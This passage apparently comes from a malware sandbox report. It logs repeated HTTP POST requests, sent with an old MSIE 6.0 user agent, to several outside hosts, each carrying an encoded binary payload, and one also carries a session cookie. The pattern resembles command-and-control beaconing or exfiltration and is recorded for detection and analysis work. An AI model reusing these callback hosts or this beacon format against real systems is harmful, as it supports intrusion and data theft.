                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 53 79 6d 61 65 4d 44 69 59 52 43 30 4f 6b 34 6c 6b 2f 64 2f 4e 76 50 62 61 78 2b 6f 47 47 45 57 39 4b 58 47 4d 74 6a 50 4b 49 66 58 57 69 30 46 70 37 4a 78 79 51 2f 73 6d 31 43 54 75 31 58 75 58 79 6f 47 51 43 75 51 44 2f 61 43 45 38 33 45 77 42 4e 65 30 4c 48 4d 47 4d 56 4c 66 62 36 56 6a 4a 64 36 41 36 56 62 41 6c 2f 58 54 4b 74 31 65 39 56 75 55 53 42 48 62 34 78 51 53 79 52 48 4a 64 69 67 71 2f 45 79 71 65 72 47 45 6c 56 47 44 68 6e 6b 72 44 37 4d 63 5a 49 6c 6f 4b 57 78 76 61 47 30 49 4a 6c 4b 2f 66 4f 61 63 39 65 77 68 54 6d 55 37 4c 56 50 4a 70 54 70 79 2b 67 67 68 6f 61 6f 42 79 56 58 36 2f 4e 6c 6a 6e 67 66 30 74 41 36 32 34 53 79 45 6e 4a 55 54 4a 6e 48 4c 79 36 57 34 69 53 62 79 34 73 37 37 65 51 35 4b 6e 44 71 6c 6f 6b 66 45 70 68 6c 64 4b 47 30 77 71 7a 36 73 68 49 63 6f 46 31 32 75 39 6c 56 4f 6a 78 44 47 66 63 66 62 39 4f 68 54 36 51 79 55 76 33 6d 4e 37 52 74 35 52 72 4d 55 45 74 62 55 35 30 61 47 6a 4e 62 65 6a 32 37 72 44 73 48 59 57 55 2f 37 39 4b 59 44 53 58 63 4f 42 6b 42 72 4e 67 4d 68 6d 43 6e 36 68 35 76 65 36 74 7a 74 70 32 6d 51 56 4e 51 55 77 62 6b 30 53 35 77 5a 6b 57 36 35 4a 4a 6c 76 70 57 39 48 70 63 56 41 77 74 4d 6b 39 6e 32 73 4a 72 68 59 31 5a 4e 62 39 47 5a 59 66 2f 48 65 68 44 78 69 45 6c 37 76 43 2b 57 74 31 52 34 79 53 44 31 6a 48 77 4e 52 42 4a 31 72 42 74 5a 6f 57 47 6b 54 69 78 2f 64 43 4f 47 39 78 38 74 78 37 50 68 34 69 52 6a 63 69 4e 2b 6f 2f 4b 6a 65 76 6a 49 55 7a 54 65 58 57 47 6c 71 43 75 49 6a 66 51 64 31 64 4c 2f 42 4d 4a 54 6a 6b 42 7a 30 35 2f 6c 6d 66 41 66 30 34 4b 72 78 57 4f 64 47 76 4d 43 6c 31 46 72 34 37 61 53 52 65 30 4b 38 4b 65 4c 4f 4e 77 57 31 79 54 6d 7a 52 4e 56 4b 6d 72 5a 41 2f 4f 59 79 5a 64 43 77 6c 6c 74 Data Ascii: SymaeMDiYRC0Ok4lk/d/NvPbax+oGGEW9KXGMtjPKIfXWi0Fp7JxyQ/sm1CTu1XuXyoGQCuQD/aCE83EwBNe0LHMGMVLfb6VjJd6A6VbAl/XTKt1e9VuUSBHb4xQSyRHJdigq/EyqerGElVGDhnkrD7McZIloKWxvaG0IJlK/fOac9ewhTmU7LVPJpTpy+gghoaoByVX6/Nljngf0tA624SyEnJUTJnHLy6W4iSby4s77eQ5KnDqlokfEphldKG0wqz6shIcoF12u9lVOjxDGfcfb9OhT6QyUv3mN7Rt5RrMUEtbU50aGjNbej27rDsHYWU/79KYDSXcOBkBrNgMhmCn6h5ve6tztp2mQVNQUwbk0S5wZkW65JJlvpW9HpcVAwtMk9n2sJrhY1ZNb9GZYf/HehDxiEl7vC+Wt1R4ySD1jHwNRBJ1rBtZoWGkTix/dCOG9x8tx7Ph4iRjciN+o/KjevjIUzTeXWGlqCuIjfQd1dL/BMJTjkBz05/lmfAf04KrxWOdGvMCl1Fr47aSRe0K8KeLONwW1yTmzRNVKmrZA/OYyZdCwllt
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 4d 5a 58 32 38 65 33 62 38 39 65 57 72 68 77 65 35 49 79 57 31 36 61 47 4c 65 48 62 55 65 6a 43 63 52 75 51 54 37 76 61 2f 6f 66 2b 62 4c 79 63 77 59 61 59 6e 39 43 6e 34 34 37 6b 4b 30 34 57 46 49 30 57 2b 54 73 38 6d 71 4b 49 6b 74 50 31 35 72 6e 77 51 42 2f 50 71 51 2f 38 4f 7a 4e 74 4a 38 4f 50 75 64 78 67 5a 71 34 66 58 43 6d 2b 36 54 38 76 57 31 53 59 35 6f 48 6a 4c 2f 67 55 52 48 53 4f 48 37 50 38 4f 77 55 36 48 78 34 32 6e 78 42 74 54 43 48 63 67 57 54 46 57 6b 37 52 35 58 6e 67 48 53 34 75 69 68 35 37 63 45 4a 4b 46 66 41 38 33 58 39 38 50 79 54 48 2f 34 4e 6f 4c 6b 4e 5a 31 66 39 4c 78 61 76 2f 52 32 46 68 65 52 35 49 64 45 45 41 75 75 77 6c 58 30 71 39 38 37 4c 66 47 49 4f 49 34 7a 4f 6a 34 61 35 62 4f 56 36 73 45 45 48 7a 38 36 52 77 67 56 66 4a 48 43 6f 49 6a 52 32 4f 65 35 4a 71 56 69 65 69 48 67 68 38 6a 46 73 53 61 6e 30 32 69 51 41 66 6a 2b 73 70 59 65 45 52 61 42 70 4e 58 57 6f 52 7a 49 69 2f 36 4a 37 41 2f 33 78 34 2b 2b 65 2b 74 50 77 6f 67 2f 6f 2b 49 75 50 4a 52 4b 5a 74 72 78 36 63 6b 52 2b 2b 74 68 67 50 78 71 38 67 35 79 58 4f 66 6d 51 68 2b 79 33 42 32 6f 45 63 49 6c 6e 4b 71 62 56 35 68 6a 64 6c 33 36 72 6f 45 52 61 53 4b 62 63 5a 7a 4f 4a 43 46 41 75 71 43 63 49 75 64 77 62 57 6f 66 49 53 74 34 4f 36 36 7a 52 4d 6d 62 71 4e 6c 46 6f 56 4f 34 6b 32 46 6d 6c 71 6f 58 4d 58 70 7a 4a 61 39 35 58 72 5a 34 4c 77 59 57 51 66 55 45 6f 32 39 64 62 48 33 51 4a 48 30 42 2b 6c 32 39 48 2b 45 32 31 56 32 31 73 7a 45 63 4e 4a 4c 73 2f 4e 65 66 2b 59 79 68 47 52 43 47 61 41 76 71 61 6f 72 4f 2f 35 53 6d 77 67 4f 6e 52 42 61 54 45 4c 42 77 70 74 43 2f 33 78 79 66 52 41 6a 6a 4f 2f 2b 7a 7a 31 47 37 30 3d Data Ascii: MZX28e3b89eWrhwe5IyW16aGLeHbUejCcRuQT7va/of+bLycwYaYn9Cn447kK04WFI0W+Ts8mqKIktP15rnwQB/PqQ/8OzNtJ8OPudxgZq4fXCm+6T8vW1SY5oHjL/gURHSOH7P8OwU6Hx42nxBtTCHcgWTFWk7R5XngHS4uih57cEJKFfA83X98PyTH/4NoLkNZ1f9Lxav/R2FheR5IdEEAuuwlX0q987LfGIOI4zOj4a5bOV6sEEHz86RwgVfJHCoIjR2Oe5JqVieiHgh8jFsSan02iQAfj+spYeERaBpNXWoRzIi/6J7A/3x4++e+tPwog/o+IuPJRKZtrx6ckR++thgPxq8g5yXOfmQh+y3B2oEcIlnKqbV5hjdl36roERaSKbcZzOJCFAuqCcIudwbWofISt4O66zRMmbqNlFoVO4k2FmlqoXMXpzJa95XrZ4LwYWQfUEo29dbH3QJH0B+l29H+E21V21szEcNJLs/Nef+YyhGRCGaAvqaorO/5SmwgOnRBaTELBwptC/3xyfRAjjO/+zz1G70=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 38 6b 35 73 38 78 48 6f 38 39 64 49 37 31 6f 55 73 49 4c 78 43 32 70 36 63 73 6e 50 32 71 7a 56 31 62 2b 51 57 34 31 74 78 4b 71 30 53 7a 48 32 56 6f 39 44 31 72 35 35 58 76 79 6d 76 46 6d 34 38 32 45 6f 65 36 31 48 67 36 43 34 36 4c 63 75 33 34 62 42 79 68 66 61 31 44 53 52 48 36 4b 71 4a 57 4a 6f 2f 58 41 43 49 47 32 70 41 54 71 76 32 5a 72 56 35 50 67 2f 63 71 62 6b 4c 30 53 32 77 78 41 34 74 44 57 6a 59 74 65 65 66 46 2f 58 66 68 35 73 49 35 34 69 46 4e 6c 66 4b 4a 4a 79 55 73 51 37 6a 36 71 41 6e 58 56 4e 64 33 78 4b 31 49 43 70 66 43 33 4d 4d 7a 36 44 41 39 33 71 73 70 6c 45 55 68 74 45 50 4c 52 6b 37 69 50 37 63 75 70 46 67 50 5a 55 67 50 50 2f 30 76 56 47 5a 65 58 75 47 64 6a 42 69 39 6f 6e 63 34 6d 54 32 59 50 6d 5a 34 7a 45 48 50 48 52 4a 39 55 4c 57 64 54 51 77 65 56 4e 71 4b 68 35 49 77 41 68 51 77 77 41 64 35 69 64 79 67 74 4c 35 66 58 56 72 65 67 58 7a 55 33 75 4a 34 4b 47 42 46 65 63 49 4e 69 67 37 59 68 65 75 43 6f 6f 78 37 74 6a 76 55 47 68 62 75 35 56 72 6f 41 35 4d 64 4b 4a 4f 61 66 36 4a 6a 45 75 71 6d 78 48 68 77 71 57 75 43 44 47 77 36 48 36 74 45 71 70 44 4d 62 66 5a 69 78 43 44 69 55 34 6a 33 33 62 44 4e 6e 38 61 36 7a 67 65 4c 68 70 51 33 66 6f 4a 34 31 31 72 79 50 69 6b 56 30 53 4e 6b 47 4b 48 77 50 69 62 4c 35 7a 79 44 65 48 37 37 56 34 32 47 62 34 75 54 6e 53 6e 52 52 72 6f 57 35 70 75 6a 5a 56 62 66 34 59 57 4c 47 64 6d 74 54 74 70 65 34 2b 48 6c 68 6a 79 5a 6b 44 69 51 6e 71 68 58 73 35 48 58 6e 44 75 4d 2b 31 56 36 73 6b 32 56 6a 47 66 34 72 65 47 69 6d 67 45 6c 53 52 4d 34 42 44 72 65 55 62 56 32 6d 72 6d 52 68 47 78 36 4c 77 49 38 4e 42 73 68 4d 2f 44 6f 46 51 4c 7a 6f 2b 6d 6b 55 51 57 76 41 3d Data Ascii: 8k5s8xHo89dI71oUsILxC2p6csnP2qzV1b+QW41txKq0SzH2Vo9D1r55XvymvFm482Eoe61Hg6C46Lcu34bByhfa1DSRH6KqJWJo/XACIG2pATqv2ZrV5Pg/cqbkL0S2wxA4tDWjYteefF/Xfh5sI54iFNlfKJJyUsQ7j6qAnXVNd3xK1ICpfC3MMz6DA93qsplEUhtEPLRk7iP7cupFgPZUgPP/0vVGZeXuGdjBi9onc4mT2YPmZ4zEHPHRJ9ULWdTQweVNqKh5IwAhQwwAd5idygtL5fXVregXzU3uJ4KGBFecINig7YheuCoox7tjvUGhbu5VroA5MdKJOaf6JjEuqmxHhwqWuCDGw6H6tEqpDMbfZixCDiU4j33bDNn8a6zgeLhpQ3foJ411ryPikV0SNkGKHwPibL5zyDeH77V42Gb4uTnSnRRroW5pujZVbf4YWLGdmtTtpe4+HlhjyZkDiQnqhXs5HXnDuM+1V6sk2VjGf4reGimgElSRM4BDreUbV2mrmRhGx6LwI8NBshM/DoFQLzo+mkUQWvA=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 39 2b 69 61 63 41 63 49 33 39 65 6c 4d 70 36 37 4e 69 57 6b 32 4e 44 37 39 6c 4c 39 67 4f 73 2f 4b 35 54 61 4f 6d 33 78 6c 36 70 57 2b 63 36 4b 47 34 4f 42 4f 4c 38 70 73 4c 51 72 78 73 69 67 47 68 34 32 48 64 7a 61 58 4a 4b 4f 49 52 65 37 6c 71 62 30 68 68 42 41 2f 62 33 44 6c 56 57 59 42 2b 56 72 4e 61 65 6d 36 36 79 4b 66 37 6c 5a 72 59 6e 43 71 70 72 63 77 43 67 75 49 6a 36 4a 74 71 4f 53 7a 32 57 7a 35 72 71 4b 49 34 47 47 50 5a 54 74 6f 5a 52 2b 62 73 49 68 31 62 71 7a 49 46 54 57 78 6a 75 30 31 39 2f 6c 4f 64 62 35 53 31 41 32 4a 34 6c 52 73 42 55 51 4a 38 4b 52 50 50 32 35 42 39 48 43 49 2f 33 65 31 6d 61 78 36 6c 77 6e 2f 35 70 33 74 64 7a 69 69 34 52 53 53 71 34 34 33 51 4e 6f 68 70 44 38 35 36 6a 55 72 6e 67 33 42 74 52 65 50 4f 54 6d 62 65 41 53 79 2b 47 47 50 77 47 38 57 50 6d 6b 32 71 51 4d 61 6e 34 6d 2b 37 2f 71 35 66 52 72 4b 52 44 62 39 2b 53 2f 76 2f 68 4c 53 5a 4a 45 6b 37 45 2f 4e 31 74 53 4b 37 77 47 51 49 43 63 30 67 76 73 30 71 43 72 4c 41 4c 72 59 66 2f 47 44 70 36 50 6e 6c 79 41 4e 55 2b 30 69 38 73 5a 2b 4b 50 53 30 33 68 31 74 4b 6a 37 49 30 42 4b 51 42 7a 38 55 31 67 62 32 31 79 31 6e 63 2b 69 77 49 78 57 67 46 75 50 54 61 76 79 6c 50 41 75 63 76 2f 51 6f 52 75 50 72 35 54 70 56 36 50 50 56 6c 73 30 71 50 4b 6a 47 78 79 49 31 78 67 4c 68 41 64 4a 71 7a 6f 77 44 45 49 6f 63 6d 65 59 68 2f 2b 33 2b 41 54 70 62 69 73 61 30 47 4b 68 71 68 4e 55 61 70 42 6f 46 4a 4e 59 50 53 69 2f 6a 70 43 53 49 39 4a 70 48 37 34 56 44 5a 47 7a 69 62 50 38 6a 52 54 42 66 4a 6c 49 39 54 76 36 71 55 57 66 34 5a 70 54 6d 42 55 66 34 56 41 72 62 4f 56 74 45 37 61 2b 37 36 75 4e 78 4e 33 6c 6d 5a 57 79 79 4c 49 42 67 50 54 30 67 5a 46 77 7a 72 31 79 61 30 53 31 52 6a 4a 79 6b 4d 4e 34 31 51 63 3d Data Ascii: 9+iacAcI39elMp67NiWk2ND79lL9gOs/K5TaOm3xl6pW+c6KG4OBOL8psLQrxsigGh42HdzaXJKOIRe7lqb0hhBA/b3DlVWYB+VrNaem66yKf7lZrYnCqprcwCguIj6JtqOSz2Wz5rqKI4GGPZTtoZR+bsIh1bqzIFTWxju019/lOdb5S1A2J4lRsBUQJ8KRPP25B9HCI/3e1max6lwn/5p3tdzii4RSSq443QNohpD856jUrng3BtRePOTmbeASy+GGPwG8WPmk2qQMan4m+7/q5fRrKRDb9+S/v/hLSZJEk7E/N1tSK7wGQICc0gvs0qCrLALrYf/GDp6PnlyANU+0i8sZ+KPS03h1tKj7I0BKQBz8U1gb21y1nc+iwIxWgFuPTavylPAucv/QoRuPr5TpV6PPVls0qPKjGxyI1xgLhAdJqzowDEIocmeYh/+3+ATpbisa0GKhqhNUapBoFJNYPSi/jpCSI9JpH74VDZGzibP8jRTBfJlI9Tv6qUWf4ZpTmBUf4VArbOVtE7a+76uNxN3lmZWyyLIBgPT0gZFwzr1ya0S1RjJykMN41Qc=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 43 45 70 79 39 4a 50 77 38 39 64 74 2f 55 70 33 57 72 77 48 35 44 7a 4d 39 6c 5a 35 30 68 67 68 64 35 2b 30 2b 6b 33 61 51 55 32 72 62 64 76 59 34 4a 4e 73 62 75 59 65 41 49 77 45 7a 51 6d 4a 54 63 32 4a 79 73 30 37 39 4f 53 77 46 31 59 74 2f 4e 73 50 73 59 32 46 5a 4c 44 33 41 53 71 4c 70 75 6c 4a 75 59 4f 61 46 65 34 30 75 58 73 43 59 4b 47 31 4c 32 55 67 48 59 76 48 54 68 37 56 42 6b 63 6e 58 76 61 69 70 58 44 47 6f 39 69 36 76 6b 43 42 45 76 76 6e 41 4b 4d 46 62 72 6d 6f 69 6d 69 35 2b 4b 53 6f 31 36 6b 53 62 66 54 35 2b 51 5a 35 4e 52 6e 73 7a 51 62 2f 55 49 64 33 4e 67 30 64 73 34 63 32 67 66 44 50 53 54 50 45 4d 76 61 76 76 6f 4e 46 6b 4b 57 55 76 53 70 64 35 71 2f 4b 74 72 51 63 61 6a 41 6e 53 69 6d 2b 72 66 68 4a 67 73 34 6f 78 4e 6c 39 4b 54 42 36 2b 33 55 6e 69 39 4c 33 6e 51 71 36 47 78 32 58 48 65 6b 35 4d 47 39 70 69 4d 6e 42 49 58 6d 6b 57 77 50 50 45 45 36 47 71 46 4b 32 6d 44 58 37 72 55 5a 76 4e 69 43 6f 6d 49 62 50 39 63 50 47 68 4d 65 65 76 57 41 47 71 4d 2b 42 36 4f 31 6c 36 39 6f 33 79 6e 62 62 6a 72 78 2f 4d 45 71 69 44 52 43 2f 47 70 6c 49 58 62 6c 41 6d 65 6c 76 79 49 41 56 30 31 4f 76 52 70 63 66 39 4c 64 44 4e 39 36 32 34 35 2b 50 68 6c 59 72 79 59 37 4d 6b 62 52 63 62 74 42 55 42 41 6c 76 32 6a 45 6a 41 49 33 53 68 77 47 61 63 4b 55 68 45 31 61 75 47 66 64 4e 72 74 30 37 51 75 38 41 45 43 33 5a 6c 65 70 4a 6d 4d 7a 4f 38 31 76 6a 73 43 63 7a 63 56 73 4a 2b 69 70 4b 4d 38 64 33 6e 52 51 30 71 73 6e 78 76 4f 6e 57 36 4d 49 35 4d 6e 4a 6a 44 77 4d 4c 57 4b 53 41 56 71 5a 49 30 50 74 6e 61 6b 43 49 74 32 62 55 6a 78 51 54 56 69 72 6d 4a 4d 52 41 65 78 47 53 41 63 77 64 61 62 33 70 43 2f 56 39 35 7a 32 2b 6c 6d 53 70 46 35 69 51 65 59 6a 36 4a 44 77 35 30 37 30 59 41 56 47 63 32 71 59 54 66 67 3d 3d Data Ascii: CEpy9JPw89dt/Up3WrwH5DzM9lZ50hghd5+0+k3aQU2rbdvY4JNsbuYeAIwEzQmJTc2Jys079OSwF1Yt/NsPsY2FZLD3ASqLpulJuYOaFe40uXsCYKG1L2UgHYvHTh7VBkcnXvaipXDGo9i6vkCBEvvnAKMFbrmoimi5+KSo16kSbfT5+QZ5NRnszQb/UId3Ng0ds4c2gfDPSTPEMvavvoNFkKWUvSpd5q/KtrQcajAnSim+rfhJgs4oxNl9KTB6+3Uni9L3nQq6Gx2XHek5MG9piMnBIXmkWwPPEE6GqFK2mDX7rUZvNiComIbP9cPGhMeevWAGqM+B6O1l69o3ynbbjrx/MEqiDRC/GplIXblAmelvyIAV01OvRpcf9LdDN96245+PhlYryY7MkbRcbtBUBAlv2jEjAI3ShwGacKUhE1auGfdNrt07Qu8AEC3ZlepJmMzO81vjsCczcVsJ+ipKM8d3nRQ0qsnxvOnW6MI5MnJjDwMLWKSAVqZI0PtnakCIt2bUjxQTVirmJMRAexGSAcwdab3pC/V95z2+lmSpF5iQeYj6JDw5070YAVGc2qYTfg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheCookie: rfqtk_wp_session_e2ba905bf306f46faca223d3cb20e2cf=7a0ab8177bcc9037fa5e74a7f04ca82b%7C%7C%7C%7CData Raw: 4d 73 41 78 30 6b 74 30 41 39 6a 66 36 7a 67 63 6f 72 31 45 38 4c 54 67 79 6b 79 52 2f 4c 30 63 72 33 70 51 76 63 37 67 74 78 57 7a 51 55 75 37 45 36 30 58 61 7a 70 69 6f 57 50 6b 58 4a 73 59 70 78 4a 45 65 79 6a 78 7a 62 37 68 6b 56 6c 4c 6e 68 58 35 74 2b 30 48 37 63 4f 48 71 67 45 58 4d 6a 68 31 76 4b 2b 50 70 47 47 6d 2f 61 64 2b 30 41 6c 50 4a 4c 6d 38 50 4b 54 75 6f 2b 42 54 50 52 5a 6d 2f 4c 71 2f 2f 53 62 46 46 43 51 53 53 61 79 41 33 41 78 32 61 69 66 45 67 6a 78 42 44 72 73 4a 4d 37 75 56 79 69 59 43 50 56 55 53 48 41 6e 50 50 53 54 6b 62 72 42 35 53 31 6b 41 63 32 43 42 77 55 4c 52 71 65 37 61 64 34 36 54 78 77 78 45 35 68 45 51 64 6e 30 42 71 36 77 6c 34 45 6f 56 4a 4f 54 46 66 67 67 44 4d 4f 4c 76 75 4a 53 69 39 30 4c 71 44 2b 67 2f 74 51 48 34 63 35 2f 78 52 63 7a 6e 61 57 74 61 67 6a 73 73 74 72 67 5a 5a 6f 59 54 33 38 6d 77 5a 64 36 48 61 62 30 6e 31 6a 4d 32 6b 5a 6a 46 45 76 4a 6e 64 38 76 77 65 4b 74 49 2f 4a 4e 34 79 35 39 6b 57 6f 41 71 32 57 41 51 41 4a 62 54 64 73 4f 74 2b 68 44 6d 78 58 39 76 32 4c 30 48 42 79 4c 43 74 47 7a 35 44 30 68 50 6e 33 47 73 76 66 4e 58 39 75 4e 67 53 48 69 61 36 74 53 54 58 70 75 48 6e 72 2b 67 64 65 64 46 41 61 77 48 72 76 39 64 65 2f 38 6e 6a 4a 7a 55 6a 32 32 59 52 70 77 37 52 6d 54 4b 74 30 59 6e 78 59 75 50 5a 42 65 6e 4f 6b 49 48 56 34 57 6c 46 4f 38 44 65 61 79 7a 43 66 34 51 38 76 52 69 47 6a 43 33 71 68 58 58 39 53 31 75 79 43 42 78 51 47 48 55 48 63 54 32 37 2b 71 54 42 4c 51 70 33 6b 6f 55 34 2f 32 49 4a 6b 31 44 7a 44 41 52 41 55 46 55 36 53 6c 50 32 34 62 57 2b 35 75 31 79 75 52 38 4c 50 6b 4f 37 6f 76 70 4a 76 4f 79 73 32 39 56 4a 4c 57 66 50 66 78 73 69 48 58 2f Data Ascii: MsAx0kt0A9jf6zgcor1E8LTgykyR/L0cr3pQvc7gtxWzQUu7E60XazpioWPkXJsYpxJEeyjxzb7hkVlLnhX5t+0H7cOHqgEXMjh1vK+PpGGm/ad+0AlPJLm8PKTuo+BTPRZm/Lq//SbFFCQSSayA3Ax2aifEgjxBDrsJM7uVyiYCPVUSHAnPPSTkbrB5S1kAc2CBwULRqe7ad46TxwxE5hEQdn0Bq6wl4EoVJOTFfggDMOLvuJSi90LqD+g/tQH4c5/xRcznaWtagjsstrgZZoYT38mwZd6Hab0n1jM2kZjFEvJnd8vweKtI/JN4y59kWoAq2WAQAJbTdsOt+hDmxX9v2L0HByLCtGz5D0hPn3GsvfNX9uNgSHia6tSTXpuHnr+gdedFAawHrv9de/8njJzUj22YRpw7RmTKt0YnxYuPZBenOkIHV4WlFO8DeayzCf4Q8vRiGjC3qhXX9S1uyCBxQGHUHcT27+qTBLQp3koU4/2IJk1DzDARAUFU6SlP24bW+5u1yuR8LPkO7ovpJvOys29VJLWfPfxsiHX/
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 31 61 4e 4d 39 46 72 76 38 39 65 2f 77 35 49 52 66 66 62 35 78 4a 32 42 44 66 4e 4b 6f 73 72 51 4c 72 2b 6f 5a 4c 39 64 42 55 44 39 43 45 2f 39 35 71 55 37 2b 58 53 69 6f 4f 33 32 2b 62 2b 71 53 34 50 54 34 2f 53 53 52 59 6f 6f 64 2b 79 36 4d 51 62 2b 59 30 30 51 59 72 6d 66 7a 31 55 78 74 5a 68 6c 58 44 55 53 48 72 70 74 31 4c 48 78 6d 49 53 57 56 71 66 33 4a 56 62 4a 74 75 6d 65 37 55 39 4b 4d 72 44 4f 45 43 69 79 5a 41 62 4f 74 6a 73 41 2f 4b 4c 78 72 4e 78 36 4e 6a 72 65 53 64 30 4c 72 4f 50 62 57 50 58 4a 62 69 68 4d 56 2b 7a 76 6b 6d 44 72 7a 4c 58 5a 7a 77 55 4e 2f 36 49 4c 73 32 4b 37 2b 6a 43 68 48 56 52 49 47 49 6f 56 69 50 70 73 61 6a 62 72 36 4a 43 77 53 4b 44 73 76 31 57 67 57 43 61 6c 41 52 58 73 77 65 45 49 76 33 4d 4c 61 71 6d 32 53 6a 4f 49 4d 38 65 74 6a 52 6e 47 69 70 62 7a 35 51 68 74 4a 4a 6c 6e 6a 73 65 48 6e 51 55 67 63 33 55 2b 78 45 59 46 36 58 78 68 64 31 57 38 36 6b 47 6d 54 5a 79 31 39 37 41 53 4f 62 42 48 46 37 73 34 47 4e 33 65 31 41 79 6c 67 51 48 4b 6d 66 34 52 63 35 4f 72 32 34 47 45 4f 79 37 36 45 49 2b 49 30 6e 45 73 71 61 72 63 38 67 38 55 41 73 51 6d 4c 52 58 49 62 45 42 35 79 55 64 32 37 69 75 64 78 36 4a 43 5a 34 62 78 53 66 73 53 2b 42 45 77 50 49 7a 4b 6d 2f 5a 76 4e 54 38 64 2f 65 6e 6c 75 2b 38 4b 6d 37 50 6d 49 31 47 36 57 6e 62 73 52 46 33 4f 6a 37 76 46 2b 30 32 57 46 76 41 2f 48 6d 6b 6e 58 31 45 56 42 77 64 7a 36 4f 61 42 67 68 5a 51 46 4e 57 35 6d 68 43 44 62 2b 71 41 6c 41 77 35 64 69 4c 67 4e 61 34 79 54 6f 32 74 62 70 4f 57 43 68 61 36 58 69 64 59 71 2f 6e 53 48 73 58 74 35 35 2b 49 7a 67 68 69 69 32 47 39 52 68 37 4e 77 31 36 5a 41 4a 75 4c 6b 43 6b 45 49 47 52 48 69 77 3d 3d Data Ascii: 1aNM9Frv89e/w5IRffb5xJ2BDfNKosrQLr+oZL9dBUD9CE/95qU7+XSioO32+b+qS4PT4/SSRYood+y6MQb+Y00QYrmfz1UxtZhlXDUSHrpt1LHxmISWVqf3JVbJtume7U9KMrDOECiyZAbOtjsA/KLxrNx6NjreSd0LrOPbWPXJbihMV+zvkmDrzLXZzwUN/6ILs2K7+jChHVRIGIoViPpsajbr6JCwSKDsv1WgWCalARXsweEIv3MLaqm2SjOIM8etjRnGipbz5QhtJJlnjseHnQUgc3U+xEYF6Xxhd1W86kGmTZy197ASObBHF7s4GN3e1AylgQHKmf4Rc5Or24GEOy76EI+I0nEsqarc8g8UAsQmLRXIbEB5yUd27iudx6JCZ4bxSfsS+BEwPIzKm/ZvNT8d/enlu+8Km7PmI1G6WnbsRF3Oj7vF+02WFvA/HmknX1EVBwdz6OaBghZQFNW5mhCDb+qAlAw5diLgNa4yTo2tbpOWCha6XidYq/nSHsXt55+Izghii2G9Rh7Nw16ZAJuLkCkEIGRHiw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 4d 5a 58 32 38 65 33 62 38 39 65 57 72 68 77 65 35 49 79 57 31 36 61 47 4c 65 48 62 55 65 6a 43 63 52 75 51 54 37 76 61 2f 6f 66 2b 62 4c 79 63 77 59 61 59 6e 39 43 6e 34 34 37 6b 4b 30 34 57 46 49 30 57 2b 54 73 38 6d 71 4b 49 6b 74 50 31 35 72 6e 77 51 42 2f 50 71 51 2f 38 4f 7a 4e 74 4a 38 4f 50 75 64 78 67 5a 71 34 66 58 43 6d 2b 36 54 38 76 57 31 53 59 35 6f 48 6a 4c 2f 67 55 52 48 53 4f 48 37 50 38 4f 77 55 36 48 78 34 32 6e 78 42 74 54 43 48 63 67 57 54 46 57 6b 37 52 35 58 6e 67 48 53 34 75 69 68 35 37 63 45 4a 4b 46 66 41 38 33 58 39 38 50 79 54 48 2f 34 4e 6f 4c 6b 4e 5a 31 66 39 4c 78 61 76 2f 52 32 46 68 65 52 35 49 64 45 45 41 75 75 77 6c 58 30 71 39 38 37 4c 66 47 49 4f 49 34 7a 4f 6a 34 61 35 62 4f 56 36 73 45 45 48 7a 38 36 52 77 67 56 66 4a 48 43 6f 49 6a 52 32 4f 65 35 4a 71 56 69 65 69 48 67 68 38 6a 46 73 53 61 6e 30 32 69 51 41 66 6a 2b 73 70 59 65 45 52 61 42 70 4e 58 57 6f 52 7a 49 69 2f 36 4a 37 41 2f 33 78 34 2b 2b 65 2b 74 50 77 6f 67 2f 6f 2b 49 75 50 4a 52 4b 5a 74 72 78 36 63 6b 52 2b 2b 74 68 67 50 78 71 38 67 35 79 58 4f 66 6d 51 68 2b 79 33 42 32 6f 45 63 49 6c 6e 4b 71 62 56 35 68 6a 64 6c 33 36 72 6f 45 52 61 53 4b 62 63 5a 7a 4f 4a 43 46 41 75 71 43 63 49 75 64 77 62 57 6f 66 49 53 74 34 4f 36 36 7a 52 4d 6d 62 71 4e 6c 46 6f 56 4f 34 6b 32 46 6d 6c 71 6f 58 4d 58 70 7a 4a 61 39 35 58 72 5a 34 4c 77 59 57 51 66 55 45 6f 32 39 64 62 48 33 51 4a 48 30 42 2b 6c 32 39 48 2b 45 32 31 56 32 31 73 7a 45 63 4e 4a 4c 73 2f 4e 65 66 2b 59 79 68 47 52 43 47 61 41 76 71 61 6f 72 4f 2f 35 53 6d 77 67 4f 6e 52 42 61 54 45 4c 42 77 70 74 43 2f 33 78 79 66 52 41 6a 